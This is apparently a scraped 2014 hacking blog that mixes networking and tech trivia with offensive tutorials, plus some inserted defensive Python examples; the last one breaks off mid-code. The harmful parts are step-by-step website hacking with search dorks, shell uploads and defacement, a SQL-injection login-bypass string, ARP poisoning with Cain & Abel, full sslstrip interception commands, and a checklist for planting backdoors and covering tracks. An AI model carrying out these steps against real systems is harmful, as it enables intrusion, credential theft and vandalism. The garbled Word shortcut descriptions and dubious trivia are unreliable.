can be used to deliver broadband where
fiber optic cables can't be installed to the
premise.
A 2007 book described DSL as "the most
globally prolific broadband access
technology, yet it is only available to around
60–75 percent of the population in many
developed countries." A 2012 survey found
that "DSL continues to be the dominant
technology for broadband access" with 364.1
million subscribers worldwide.

Voice-over-Internet Protocol (VoIP)

Voice over IP
Voice-over-Internet Protocol (VoIP) is a
methodology and group of technologies for
the delivery of voice communications and
multimedia sessions over Internet Protocol
(IP) networks, such as the Internet. Other
terms commonly associated with VoIP are IP
telephony, Internet telephony, voice over
broadband (VoBB), broadband telephony, IP
communications, and broadband phone
service.
The term Internet telephony specifically
refers to the provisioning of communications
services (voice, fax, SMS, voice-messaging)
over the public Internet, rather than via the
public switched telephone network (PSTN).
The steps and principles involved in
originating VoIP telephone calls are similar
to traditional digital telephony and involve
signaling, channel setup, digitization of the
analog voice signals, and encoding. Instead
of being transmitted over a circuit-switched
network, however, the digital information is
packetized, and transmission occurs as IP
packets over a packet-switched network.
Such transmission entails careful
considerations about resource management
different from time-division multiplexing
(TDM) networks.

Target website hacking

>First, you can use a scanner such as
Acunetix, Netsparker, Nikto, Nessus, etc.
and check for known vulns such as
SQLi, RFI, LFI, WebDAV, etc.
>If that attack does not succeed, you can
use this awesome trick:
-First, use http://www.yougetsignal.com/
to find all the websites
running on that server
-After that, use the Bing search
engine
-Check that the target website is on a shared IP
-In Bing, search ip:server ip address
-ip:server ip address .php?id= (to check for
SQLi-vulnerable websites on that server)
-ip:server ip address admin (to find the
admin of a website on that server and use
SQL injection)
-ip:server ip address upload (to upload the
shell to a website)
>If you find any vuln (such as SQLi, RFI, WebDAV, etc.)
you can upload your shell to that website, and by
using that shell you can get access to the
target website. Once you have access to the target
website you can deface the whole website.
******************************
**********************************
There are several dorks for finding vulns.
You can create your own dork and use it
for hacking all the websites on that server.

Prominent world founders

*Founder of Facebook – Mark Zuckerberg
*Founder of Apple Computers – Steve Jobs
*Founder of Artificial Intelligence – John
McCarthy
*Founder of Bluetooth – Ericsson
*Father of Computer – Charles Babbage
*Father of ‘C’ Language – Dennis Ritchie
*Founder of Email – Shiva Ayyadurai
*Founder of Google – Larry Page and Sergey
Brin
*Founder of Internet – Vint Cerf
*Father of ‘Java’- James Gosling
*Father of JQuery – John Resig
*Founder of Keyboard – Christopher Latham
Sholes
*Founder of Linux – Linus Torvalds
*Founder of Microsoft – Bill Gates and Paul
Allen
*Founder of Mobile Phones – Martin Cooper
*Founder of Mouse – Douglas Engelbart
*Founders of Oracle – Ed Oates, Larry
Ellison, Bob Miner
*Founder of Php – Rasmus Lerdorf
*Founder of USB – Ajay V.Bhatt
*Founder of WWW – Tim Berners-Lee
*Founder of Yahoo – Jerry Yang and David
Filo

Wednesday 6 August 2014

Eight unknown facts of android -

• It wasn't Google's idea: Android was the
brainchild of
Andy Rubin, who founded Android Inc. in
October 2003
with the aim of creating a new mobile
platform. Google
later bought Android Inc. and hired Rubin
and others in
August 2005.
• It almost didn't work out: Android almost
immediately
ran out of cash after its founding, only to be
saved,
according to the Businessweek, by Steve
Perlman.
• The Nexus line was a hot rumour years
before the
Nexus One: People started predicting about
the
"gPhone" as early as 2007 though Nexus
came out in
2010.
• Microsoft thought it would be a non-event:
Microsoft's Scott Horn, then head of the
Windows
Mobile marketing team, had told Engadget
after
Android's release, "I don't understand the
impact they
are going to have."
• Resolution scaling was introduced in
Version 1.6: The
ability to automatically scale images based
on display
size appeared in Donut, or Android 1.6,
paving the way
for the huge range of device form factors on
the Android
market today.
• There's an Android phone in space: A
British firm
launched a Nexus phone into space, to control
a satellite
as part of an experiment and see how well
consumer-
grade electronics stand up to the rigors of
space.
• Every app you run on your Android phone
gets its own
virtual machine: Each active app on an
Android device
runs in its own Dalvik VM, which keeps it
safe and
separate from core functions. This improves
battery life
and boosts performance of the phone.
• The first official version code name was
NOT a
dessert: Google's Dan Morrill confirmed in
January that
the very first alpha version of Android
released to
internal developers was R2-D2.

Tuesday 5 August 2014

Microsoft Word shortcut keys

Ctrl + b : you can order your
favorite file by this command
ctrl + f : you can search for
some word
ctrl + s : save the work you've
done
ctrl + shift or right index
makes the writing go to the
left
alt + f4 : is useful to close the
windows
alt + esc you can move from
window to window
alt + tab : is very useful if
there are many windows open
you can choose the required
window
alt + shift : switch between
languages
f2 : very useful and fast to
change the name of a specific
file
Ctrl + C : Copy
Ctrl + X : Cut
Ctrl + V : Paste
Ctrl + Z : Undo
Ctrl + A : Select all
Ctrl + ESC : task list (Start)
Ctrl + Enter : Starting a new
page
Ctrl + END : Move to end of
file
Ctrl + F5 : Thumbnail file
window
Ctrl + F6 : move between files
Ctrl + F2 : preview the page
before printing
= + Ctrl : zoom in and out,
one degree
F4 : repeat the last process
Alt + Enter : repeat the last
process
Ctrl + Y : repeat the last
process
Shift + F10 : Bullets and
digital
F12 : Save As
Shift + F12 : Save the file
Ctrl + Home : the first
document
Ctrl + End : Latest document
Shift + F1 : information about
type of coordination
Ctrl + U : line under the text
Ctrl + F4 : Exit from the file
Ctrl + N : New File
Ctrl + H : Replacement
Ctrl + I : slash
Ctrl + K : Document Format
Ctrl + P : Print
Ctrl + O : open area
Alt + S : List Format
Alt + J : Help Menu
[+ Alt : List Table
] + Alt : Tools Menu
Alt + U : View menu
Alt + P : Edit Menu
Alt + L : file list
"+ Alt : window List
Alt + Q : modified procedure
Ctrl + E : Center text
Ctrl + F : Search
Ctrl + B : black line
Ctrl + Shift + P : font size
Ctrl + Shift + S : Style
Ctrl + D : line
Ctrl + Shift + K : character
conversion - Capital
Shift + F3 : character
conversion - Capital
Ctrl + Shift + L : point at the
beginning of the text
Ctrl + Alt + E : footnotes
numbered Romanian
Ctrl + Alt + R : Mark ®
Ctrl + Alt + T : Mark ™
Ctrl + Alt + C : Mark ©
Ctrl + Alt + I : preview the
page before printing
Shift + F7 : Thesaurus
Ctrl + Alt + F1 : System
Information
Ctrl + Alt + F2 : Open
Directories
Ctrl + J : resolving the text
from both sides
Ctrl + L : the beginning of the
text from the left side
Ctrl + Q : the beginning of the
text from the right side
Ctrl + E : Center text
Ctrl + M : changing the size of
the top paragraph
Shift + F5 : To return to the
position that you finished it
when you close the file
= + Ctrl + Alt : Customize
F3 : AutoText entry
F9 : Check fields
F10 : Move the framework to
open windows
F1 : Help
F5 : Jump to
F7 : Spelling
F8 : Select Zone

Why Programming For Hacking ???

Learn a programming language. You
shouldn't limit yourself to any particular
language, but there are a few guidelines.
C is the language that Unix was built with. It
(along with assembly language) teaches
something that's very important in hacking:
how memory works.
Python or Ruby are high-level, powerful
scripting languages that can be used to
automate various tasks.
Perl is a reasonable choice in this field as
well, while PHP is worth learning because the
majority of web applications use PHP.
Bash scripting is a must. That is how to
easily manipulate Unix/Linux systems—
writing scripts, which will do most of the job
for you.
Assembly language is a must-know. It is the
basic language that your processor
understands, and there are multiple
variations of it. At the end of the day, all
programs are eventually interpreted as
assembly. You can't truly exploit a program
if you don't know assembly.

Top Ten Torrent Web Sites

1) The Pirate Bay
2) KickassTorrents
3) Torrentz
4) ExtraTorrent
5) YIFY-Torrents
6) EZTV
7) 1337x
8) isoHunt.to
9) BitSnoop
10) RARBG
": Legal Warning :- Copy right Files
Downloading From Pirates Sites Are illegal "

What is Tabnabbing?

Tabnabbing is a computer exploit and
phishing attack, which persuades users
to submit their login details and
passwords to popular websites by
impersonating those sites and convincing
the user that the site is genuine. The
attack's name was coined in early 2010
by Aza Raskin, a security researcher
and design expert.
The attack takes advantage of user
trust and inattention to detail in
regard to tabs, and the ability of
modern web pages to rewrite tabs and
their contents a long time after the
page is loaded. Tabnabbing operates in
reverse of most phishing attacks in that
it doesn’t ask users to click on an
obfuscated link but instead loads a fake
page in one of the open tabs in your
browser.
The exploit employs scripts to rewrite a
page of average interest with an
impersonation of a well-known website,
when left unattended for some time. A
user who returns after a while and sees
the rewritten page may be induced to
believe the page is legitimate and enter
their login, password and other details
that will be used for improper purposes.
The attack can be made more likely to
succeed if the script checks for well
known Web sites the user has loaded in
the past or in other tabs, and loads a
simulation of the same sites. This attack
can be done even if JavaScript is
disabled, using the "meta refresh" meta
element, an HTML attribute used for
page redirection that causes a reload of
a specified new page after a given time
interval.
The NoScript extension for Mozilla
Firefox defends both from the
JavaScript-based and from the
scriptless attack, based on meta
refresh, by preventing inactive tabs

Sniffing password over network by cain and abel

Introduction
UNIX users often smugly assert that the best
free security tools support their platform
first, and Windows ports are often an
afterthought. They are usually right, but Cain
& Abel is a glaring exception. This Windows-
only password recovery tool handles an
enormous variety of tasks. It can recover
passwords by sniffing the network, cracking
encrypted passwords using Dictionary, Brute-
Force and Cryptanalysis attacks, recording
VoIP conversations, decoding scrambled
passwords, revealing password boxes,
uncovering cached passwords and analyzing
routing protocols.
We are going to explain Cain & Abel in
context to Man-in-the-middle attack.
Sniffing LAN passwords using Cain & Abel.
(Works only for Ethernet networks)
>Run Cain & Abel
>Now click on the Sniffer tab, right-click and
select Scan MAC Addresses.
>Check "All tests" and click OK. Cain & Abel
will start scanning the MAC addresses
>Click ARP (yellow symbol) after
scanning the hosts, then click the plus symbol
>Click any IP in the left-hand box; the hosts
automatically appear in the right-hand box
>Press Ctrl or Shift to select all, then click OK
>All the hosts are in Idle position; then click the
yellow symbol to start the poisoning
>Now ARP poisoning starts in the network
>Check the logs. Click the password options
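What the poisoning described above looks like from the defender's side, as an added example that is not part of the original post: while it runs, one MAC address answers for several IP addresses, including the gateway's, and known IPs change MAC. The ARP tables, addresses and function names below are constructed for illustration.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed samples in the layout printed by Windows `arp -a`.
BASELINE = """\
Interface: 192.168.0.50 --- 0xb
  Internet Address      Physical Address      Type
  192.168.0.1           00-11-22-aa-bb-01     dynamic
  192.168.0.23          00-11-22-aa-bb-17     dynamic
  192.168.0.77          00-11-22-aa-bb-4d     dynamic
  192.168.0.255         ff-ff-ff-ff-ff-ff     static
"""

# Same LAN while host .77 is poisoning: its MAC now answers for the
# gateway (.1) and for another host (.23) as well.
POISONED = """\
Interface: 192.168.0.50 --- 0xb
  Internet Address      Physical Address      Type
  192.168.0.1           00-11-22-aa-bb-4d     dynamic
  192.168.0.23          00-11-22-aa-bb-4d     dynamic
  192.168.0.77          00-11-22-aa-bb-4d     dynamic
  192.168.0.255         ff-ff-ff-ff-ff-ff     static
"""

ARP_LINE = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+"
    r"([0-9A-Fa-f]{2}(?:[-:][0-9A-Fa-f]{2}){5})\s+(\w+)"
)


def parse_arp_table(text):
    """Return {ip: mac} for the unicast entries of `arp -a` style output."""
    table = {}
    for line in text.splitlines():
        match = ARP_LINE.match(line)
        if not match:
            continue  # interface banner, column header, blank line
        ip = match.group(1)
        mac = match.group(2).lower().replace("-", ":")
        # Broadcast and multicast MACs have the lowest bit of the first
        # octet set; they are shared by design, so they are not evidence.
        if int(mac[:2], 16) & 1:
            continue
        table[ip] = mac
    return table


def find_arp_anomalies(current, baseline=None):
    """Flag MACs that claim several IPs and IPs whose MAC changed.

    A MAC with several IPs can be legitimate (multi-homed router, proxy
    ARP), so treat a finding as a lead to check, not as proof.
    """
    findings = []
    by_mac = defaultdict(list)
    for ip, mac in current.items():
        by_mac[mac].append(ip)
    for mac, ips in sorted(by_mac.items()):
        if len(ips) > 1:
            ordered = sorted(ips, key=ipaddress.ip_address)
            findings.append(("duplicate_mac", mac, ordered))
    for ip in sorted(current, key=ipaddress.ip_address):
        known = (baseline or {}).get(ip)
        if known and known != current[ip]:
            findings.append(("mac_changed", ip, known, current[ip]))
    return findings


if __name__ == "__main__":
    baseline = parse_arp_table(BASELINE)
    for finding in find_arp_anomalies(parse_arp_table(POISONED), baseline):
        print(finding)
```

On a small network, pinning the gateway's MAC with a static ARP entry, or enabling dynamic ARP inspection on a managed switch, removes the condition this check looks for.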

WEB PENTESTING-

In web pentesting there
are many types of bugs in websites;
some are given below.
1. SQL injection-
This type of bug is for beginners, and there are
a lot of websites with it. For that we can insert
the following into the input field:
' or '1'='1
in both the username and the password, and
after that you can bypass the cPanel of the
website,
upload your vuln shell, and after that
use Metasploit for shared server
hacking.
If a Linux server is used, you can
root the server or symlink that particular
server.
2. SQLI-
This type of vulnerability is in the database of
the website. To attack it you can
use Havij on a Windows machine (KIDDIES). If
you work on Linux you can use
sqlmap for
database hacking. If you are a professional
hacker you can use a browser-side,
query-based
attack on the target website. Once you have
the admin username and password you can deface
the site
by using a shell such as C99, R57, etc.
3. XSS-
This is a cross-site scripting attack on a
website, in which we can insert
text into the target website that is either
reflected on the browser side or
stored
in the database of the website (server side).
4. Dir traversal-
This is a type of bug in which a sensitive
link can be opened directly from the URL
in the browser.
5. Remote code execution vulnerability-
A Remote Code Execution attack is a result of
either server side or client side security
weaknesses.
Vulnerable components may include libraries,
remote directories on a server that haven’t
been monitored, frameworks, and other
software modules that run on the basis of
authenticated user access. Applications that
use these components are always under
attack through things like scripts, malware,
and small command lines that extract
information.
Some examples of that are LFI, RFI, WebDAV
remote code execution, the JCE exploit, etc.
6. DDoS-
DDoS, or Distributed Denial of Service, is
where a server's or a machine's services are
made unavailable to its users.
Its usual agenda is to temporarily interrupt or
completely take down a successfully running
system.
A DDoS attack could be sending tons of URL
requests to a website or a webpage in a very
small amount of time.
A botnet is popularly used for DDoS: with a
botnet we can connect many clients
and after that we can flood the website.
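The login bypass in item 1 works only because the typed input is pasted into the SQL text. An added example, not part of the original post, that puts the string-built query beside the parameterized one on an in-memory SQLite database; the table, the account and the function names are constructed for illustration.

```python
import sqlite3


def make_db():
    """Constructed one-user database. The password is kept in clear text
    only so the demo stays focused on how the query is built."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    db.execute("INSERT INTO users VALUES (?, ?)",
               ("admin", "constructed-Passw0rd"))
    return db


def login_vulnerable(db, username, password):
    """The 'before': user input becomes part of the SQL statement."""
    query = ("SELECT username FROM users WHERE username = '" + username +
             "' AND password = '" + password + "'")
    row = db.execute(query).fetchone()
    return row[0] if row else None


def login_parameterized(db, username, password):
    """The fix: input is bound as data and never parsed as SQL."""
    row = db.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def apostrophe_outcome(db):
    """A legitimate value containing a quote: the string-built query breaks
    with a syntax error, the parameterized one just finds no such user."""
    try:
        login_vulnerable(db, "o'brien", "x")
        vulnerable = "ok"
    except sqlite3.OperationalError:
        vulnerable = "syntax error"
    return vulnerable, login_parameterized(db, "o'brien", "x")


if __name__ == "__main__":
    db = make_db()
    payload = "' or '1'='1"  # the string quoted in the post
    # WHERE username = '' or '1'='1' AND password = '' or '1'='1'
    # AND binds tighter than OR, so the trailing OR '1'='1' is always true.
    print("string-built :", login_vulnerable(db, payload, payload))
    print("parameterized:", login_parameterized(db, payload, payload))
    print("apostrophe   :", apostrophe_outcome(db))
```

An unexpected SQL syntax error in the application log, like the one the apostrophe case raises, is also a useful signal that some query is still being built by concatenation.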

how to use SSLstrip in kali linux:

What is sslstrip-
sslstrip is a MITM attack tool that allows an
attacker to manipulate traffic and capture
data such as user names and passwords.
How it works-
It works by converting HTTPS requests into
basic HTTP requests.
Step-1
Enable IP forwarding so our computer
can route traffic
echo 1 > /proc/sys/net/ipv4/ip_forward
Step-2
Now we need to configure iptables so that our
computer can redirect traffic
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080
Step-3
Start ARP spoofing
arpspoof -i <interface> -t <target ip> -r <gateway ip>
Step-4
Now we need to run sslstrip in a new terminal
(don't close the previous terminal)
sslstrip -l 8080
Note- you can also do the ARP spoofing with ettercap
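The downgrade described above only works while the browser is still willing to speak plain HTTP to the site, so the server-side defence is HTTP Strict Transport Security (HSTS) together with Secure cookies. An added example, not part of the original post, that audits one response for those settings; the sample headers, the finding labels and the 180-day threshold are constructed assumptions.

```python
MIN_MAX_AGE = 15552000  # assumption: about 180 days, the minimum this audit accepts
REDIRECTS = {301, 302, 307, 308}

# Constructed sample responses (header name, header value).
WEAK_HTTPS = [
    ("Content-Type", "text/html"),
    ("Set-Cookie", "session=abc123; Path=/; HttpOnly"),
]
HARDENED_HTTPS = [
    ("Strict-Transport-Security", "max-age=31536000; includeSubDomains"),
    ("Set-Cookie", "session=abc123; Path=/; HttpOnly; Secure"),
]


def parse_hsts(value):
    """Return (max_age, include_subdomains) from an HSTS header value."""
    max_age, include_sub = None, False
    for directive in value.split(";"):
        name, _, arg = directive.strip().partition("=")
        name = name.strip().lower()
        if name == "max-age":
            arg = arg.strip().strip('"')
            if arg.isdigit():
                max_age = int(arg)
        elif name == "includesubdomains":
            include_sub = True
    return max_age, include_sub


def insecure_cookies(headers):
    """Names of cookies set without the Secure attribute; a browser will
    send these over plain HTTP, where a stripped connection exposes them."""
    names = []
    for key, value in headers:
        if key.lower() != "set-cookie":
            continue
        parts = [p.strip() for p in value.split(";")]
        attrs = {p.partition("=")[0].strip().lower() for p in parts[1:]}
        if "secure" not in attrs:
            names.append(parts[0].partition("=")[0])
    return names


def audit_downgrade_exposure(scheme, status, headers):
    """Return a list of findings for one response fetched over `scheme`."""
    findings = []
    lookup = {k.lower(): v for k, v in headers}
    if scheme == "http":
        # Browsers ignore HSTS sent over HTTP; all a plain-HTTP response
        # can do is redirect to the HTTPS origin.
        location = lookup.get("location", "")
        if status not in REDIRECTS or not location.lower().startswith("https://"):
            findings.append("http-not-redirected-to-https")
        return findings
    hsts = lookup.get("strict-transport-security")
    if hsts is None:
        findings.append("hsts-missing")
    else:
        max_age, include_sub = parse_hsts(hsts)
        if max_age is None or max_age < MIN_MAX_AGE:
            findings.append("hsts-max-age-too-short")
        if not include_sub:
            findings.append("hsts-no-includesubdomains")
    findings += ["cookie-without-secure:" + n for n in insecure_cookies(headers)]
    return findings


if __name__ == "__main__":
    print(audit_downgrade_exposure("https", 200, WEAK_HTTPS))
    print(audit_downgrade_exposure("https", 200, HARDENED_HTTPS))
```

HSTS protects only after the browser has seen the header once over HTTPS; the first plain-HTTP visit stays exposed unless the domain is on the browsers' HSTS preload list.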

How Your Passwords Are Stored on the Internet

There are a number of ways a site can store
your password, and some are considerably
more secure than others. Here's a quick
rundown of the most popular methods, and
what they mean for the security of your
data.
Method One: Plain Text Passwords
How It Works: The simplest way a site can
store your password is in plain text. That
means somewhere on their server, there
exists a database with your username and
password in it in a human-readable form
(that is, if your password is testing123, it is
stored in the database as testing123). When
you enter your credentials on the site, it
checks them against the database to see if
they match. This is the worst possible
method, in security terms, and most
reputable web sites do not store passwords
in plain text. If someone hacks this database,
everyone's password is immediately
compromised.
Does My Strong Password Matter? No way.
No matter how long or strong your password
may be, if it's stored in plain text and the
site gets hacked, your password is easily
accessible to anyone, no work required. It
still matters in terms of hiding your
passwords from, say, your friends, or others
that could easily guess it, but it won't make
any difference if the site gets hacked.
Method Two: Basic Password Encryption
How It Works: To add more protection to
your password than plain text provides, most
sites encrypt your password before they
store it on their servers. Encryption, for
those of you that don't know, uses a special
key to turn your password into a random
string of text. If a hacker were to get hold of
this random string of text, they wouldn't be
able to log into your account unless they
also had the key, which they could then use
to decrypt it.
The problem is, the key is often stored on
the very same server that the passwords are,
so if the servers get hacked, a hacker doesn't
have to do much work to decrypt all the
passwords, which means this method is still
wildly insecure.
Does My Strong Password Matter? No. Since
it's easy to decrypt the password database
with a key, your strong password won't make
a difference here either. Again: this is in
terms of the site getting hacked; if you have
a nosy friend or family member rooting
through your stuff, a strong password can
help keep them from guessing it.
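The two methods above, seen from the point of view of a full-server breach, as an added example that is not part of the original article. It goes beyond the two methods by adding a salted PBKDF2 hash for contrast, which is the one scheme in which the strength of the password changes the outcome. The XOR keystream cipher is a stand-in for a real cipher so the example needs only the standard library; users, wordlist and function names are constructed.

```python
import hashlib
import hmac
import os

ITERATIONS = 100_000  # assumption for the demo; tune to your hardware

# Constructed accounts: one weak password (the article's own example)
# and one long random-looking one.
SAMPLE_USERS = {
    "alice": "testing123",
    "bob": "V7#constructed-long-passphrase-2014",
}
SAMPLE_WORDLIST = ["password", "123456", "testing123"]


def keystream(key, nonce, length):
    """HMAC-SHA256 in counter mode. Stand-in for a real cipher, demo only."""
    out, counter = b"", 0
    while len(out) < length:
        block = nonce + counter.to_bytes(4, "big")
        out += hmac.new(key, block, hashlib.sha256).digest()
        counter += 1
    return out[:length]


def encrypt(key, plaintext):
    nonce = os.urandom(16)
    data = plaintext.encode()
    stream = keystream(key, nonce, len(data))
    return nonce + bytes(a ^ b for a, b in zip(data, stream))


def decrypt(key, blob):
    nonce, body = blob[:16], blob[16:]
    stream = keystream(key, nonce, len(body))
    return bytes(a ^ b for a, b in zip(body, stream)).decode()


def hash_password(password):
    """One-way: salted PBKDF2-HMAC-SHA256. Nothing here can be decrypted."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt, digest


def verify_password(password, record):
    salt, digest = record
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return hmac.compare_digest(candidate, digest)


def build_server(users):
    """The same accounts stored three ways, with the encryption key kept
    on the same server as the article describes."""
    key = os.urandom(32)
    return {
        "key_on_disk": key,
        "plaintext": dict(users),
        "encrypted": {u: encrypt(key, p) for u, p in users.items()},
        "hashed": {u: hash_password(p) for u, p in users.items()},
    }


def exposed_after_breach(server, wordlist):
    """Which passwords a full copy of the server gives away, per scheme."""
    exposed = {"plaintext": dict(server["plaintext"])}
    # Method Two: the key sits next to the data, so everything decrypts.
    exposed["encrypted"] = {
        user: decrypt(server["key_on_disk"], blob)
        for user, blob in server["encrypted"].items()
    }
    # Hashes cannot be reversed; only passwords that appear in a list of
    # common guesses fall, so a strong password finally matters.
    exposed["hashed"] = {}
    for user, record in server["hashed"].items():
        for guess in wordlist:
            if verify_password(guess, record):
                exposed["hashed"][user] = guess
                break
    return exposed


if __name__ == "__main__":
    result = exposed_after_breach(build_server(SAMPLE_USERS), SAMPLE_WORDLIST)
    for scheme, found in result.items():
        print(scheme, "->", sorted(found))
```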

Sunday 3 August 2014

The Nmap

Nmap, aka Network Mapper, is an open
source and very versatile tool for network
administrators. Nmap is used for exploring
networks, performing security scans, network
audits and finding open ports on remote
machines. It scans for live hosts, operating
systems, packet filters and open ports
running on remote hosts.
Scan a System with Hostname and IP Address
1.Scan using Hostname
nmap server2.tecmint.com
2.Scan using IP Address
nmap 192.168.0.101
3.Scan using the “-v” option (the “-v” option
gives more detailed information about the
remote machine)
nmap -v server2.tecmint.com
4.Scan Multiple Hosts
nmap 192.168.0.101 192.168.0.102 192.168.0.103
5.Scan a whole Subnet
nmap 192.168.0.*
6.Scan Multiple Servers using last octet of IP
address
nmap 192.168.0.101,102,103
7.Scan an IP Address Range
nmap 192.168.0.101-110
8.Scan Network Excluding Remote Hosts
nmap 192.168.0.* --exclude 192.168.0.100
9.Scan OS information and Traceroute
nmap -A 192.168.0.101
10.Enable OS Detection with Nmap
nmap -O server2.tecmint.com
11.Scan a Host to Detect Firewall
nmap -sA 192.168.0.101
12.Scan a Host to check if it is protected by
a Firewall
nmap -PN 192.168.0.101
13.Find out Live hosts in a Network
nmap -sP 192.168.0.*
14.Perform a Fast Scan
nmap -F 192.168.0.101
15.Find Nmap version
nmap -V
16.Scan Ports Consecutively
nmap -r 192.168.0.101
17.Print Host interfaces and Routes
nmap --iflist
18.Scan for specific Port
nmap -p 80 server2.tecmint.com
19.Scan a TCP Port
nmap -p T:8888,80 server2.tecmint.com
20.Scan a UDP Port
nmap -sU -p 53 server2.tecmint.com
21.Scan Multiple Ports
nmap -p 80,443 192.168.0.101
22.Scan Ports by Network Range
nmap -p 80-160 192.168.0.101
23.Find Host Services version Numbers
nmap -sV 192.168.0.101
24.Scan remote hosts using TCP ACK (PA) and
TCP Syn (PS)
nmap -PS 192.168.0.101
25.Scan Remote host for specific ports with
TCP ACK
nmap -PA -p 22,80 192.168.0.101
26.Scan Remote host for specific ports with
TCP Syn
nmap -PS -p 22,80 192.168.0.101
27.Perform a stealthy Scan
nmap -sS 192.168.0.101
28.Check most commonly used Ports with
TCP Syn
nmap -sT 192.168.0.101
29.Perform a tcp null scan to fool a firewall
nmap -sN 192.168.0.101
Download link :- http://nmap.org/download.html

how to hack a website/computer 101

step 1 scan your target
step 2 find open ports that you can exploit
step 3 exploit them!
step 4 now you are in the system! fuck shit
up
step 5 create a backdoor so you can easily
access it again
step 6 leave no trace of yourself. The more silent
you get, the more you're able to hear. It's better to wait a while and see if you can access something else (like fb/email
***** You are responsible for what you do. Hacking is illegal. Good luck :)

Saturday 2 August 2014

Top Server And Admin Applications For Android And IPhone: android-vs-ios

No matter what the nature of your work is,
whether you are a webmaster, server
administrator or IT professional, the
ability to deal with your admin tasks and
your servers is your utmost priority. In this
article, we are going to discuss the top five
server and admin applications suitable
for your iPhone and Android mobile gadgets.
1. AndFTP
For those who are not yet familiar with it,
AndFTP serves as an SCP, FTP, SFTP
and FTPS client. AndFTP lets the
user handle a number of FTP configurations,
and it provides features such as download,
upload and sharing management. AndFTP
also allows the user to delete, rename,
open, or update permissions, and to run
custom commands.
2. ConnectBot
ConnectBot acts as a Secure Shell client
intended for Android users. It creates a
secure connection using a shell, even when
the gadget is at a remote distance, to
transmit files and data back and forth to
your phone. Furthermore, ConnectBot lets the
user handle a number of SSH sessions,
copy and paste between
other applications, and build protected
tunnels.
Jack Wallen, an award-winning writer at
Linux.com, stated that ConnectBot is a
must-have app; in fact he recommends this app
to Linux admins who are using an Android
phone.
3. ServerMonitor
ServerMonitor is an app intended for iPhone
users. It uses the SSH protocol to link to
machines remotely to assist with your
workstation and server monitoring requirements.
Its multi-protocol support includes the following: FTP,
SMTP, HTTP, IMAP, MySQL, HTTPS, DNS,
POP3, Ping and SSH.
Although there are not many reviews of
this app, the general response seems to
be optimistic. Based on feedback from
users, one thing they want added to
this app in the next update is the ability to
view the full list of running processes and
how much memory they occupy.
4. iSSH – SSH / VNC Console
The iSSH – SSH / VNC Console for iPhone is
an SSH and Telnet emulator that is fully
featured with ANSI, VT102, VT100, and
VT220, and incorporates a tunneled X server,
RDP client and VNC client. This app also
has the ability to carry simultaneous
connections, with total terminal
compatibility, an intuitive user interface, and
configurable macro and key options.
5. Network Utility
Network Utility lets the user check the
status of their servers or websites from
their Apple device or iPhone anywhere.
Network Utility is fully featured with TCP/IP
Port Scan, ping (ICMP Echo), IP address
information, Whois Query, GeoIP Lookup,
and more.
For me this is another iPhone app that seems
to be gathering mixed reviews. Some users
approve of its efficiency and its
user-friendliness, but other users complain
that this app causes their device to freeze up,
which can only be fixed by restarting the
device. Users also object to the
absence of subnet scans. The decision is still
out on this app. But the best thing
to do is to try it and experience how it
holds up.

Ways To Be Anonymous Online

Want to be anonymous online to view
blocked websites, protect your self from
hackers or want to hack some one and stay
un-traced?. In the following post i will
explain 4 easy ways by which you can stay
anonymous online!
1. Using Proxies
A proxy is the address (IP address) of a
server (a proxy server) that is placed between
your computer and the Internet. The
advantage of a proxy is that your real IP
address is hidden, so when you hack you are
giving the IP address of the proxy server and
not your real IP address. In the same way, if
you are a normal Internet user, a hacker
won't get your real IP but the IP of the proxy
server. You can use it to enter a site or forum
where your IP is banned. To know more
about proxies, let me know on this post
and I will post a full tutorial about it.
2. Using Tor
Tor-proxy is a free proxy-server service that
Internet users can use to hide their IP address
while surfing the Web. Tor (The Onion
Router) is free software for enabling online
anonymity. Tor directs Internet traffic
through a free, worldwide volunteer network
consisting of more than three thousand
relays to conceal a user's location or usage
from anyone. I have written a complete
how-to guide on using Tor; just let me know
if you need it.
3. SSH Tunneling
An SSH tunnel is an encrypted tunnel created
through an SSH protocol connection. SSH
tunnels may be used to tunnel unencrypted
traffic over a network through an encrypted
channel. In plain language, you can surf the
net without being monitored and even reach
blocked sites too. To know more about SSH
and SSH tunneling, let me know if you would
like to read my SSH tunneling guide.
4. Using VPN
VPN stands for Virtual Private Network.
Basically it’s a private network that lets users
connect to other users or remote sites using a
public network, usually the Internet. It uses
“virtual” connections routed through the
Internet from the company’s private network
to the remote site or employee instead of
physical connections. In short, it is a private
network constructed within a public network
infrastructure, such as the global Internet.
The biggest difference between a proxy and a
VPN is that everything in a VPN is encrypted,
which gives an additional layer of security.
There are both paid and free VPN services.

Tunneling protocol

Computer networks use a tunneling protocol
when one network protocol (the delivery
protocol) encapsulates a different payload
protocol. By using tunneling one can (for
example) carry a payload over an
incompatible delivery-network, or provide a
secure path through an untrusted network.
Tunneling typically contrasts with a layered
protocol model such as those of OSI or TCP/
IP. Typically, the delivery protocol operates
at an equal or higher level in the model than
does the payload protocol.
To understand a particular protocol stack,
network engineers must understand both the
payload and delivery protocol sets.
As an example of network layer over network
layer, Generic Routing Encapsulation (GRE), a
protocol running over IP (IP Protocol
Number 47), often serves to carry IP packets,
with RFC 1918 private addresses, over the
Internet using delivery packets with public IP
addresses. In this case, the delivery and
payload protocols are compatible, but the
payload addresses are incompatible with
those of the delivery network.
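The GRE case above, worked through byte by byte as an added example (not part of the original page): a payload packet with RFC 1918 addresses is wrapped in a basic GRE header and a delivery IPv4 header with protocol number 47, then unwrapped again. The host addresses, the payload bytes and the tunnel endpoints (taken from documentation ranges and standing in for public addresses) are constructed for illustration.

```python
import ipaddress
import struct

IPPROTO_GRE = 47         # IP protocol number for GRE, as given in the text
GRE_PROTO_IPV4 = 0x0800  # GRE protocol-type value for an IPv4 payload
RFC1918 = [ipaddress.ip_network(n)
           for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

def checksum(data: bytes) -> int:
    """Internet checksum (RFC 1071) over a header."""
    if len(data) % 2:
        data += b"\x00"
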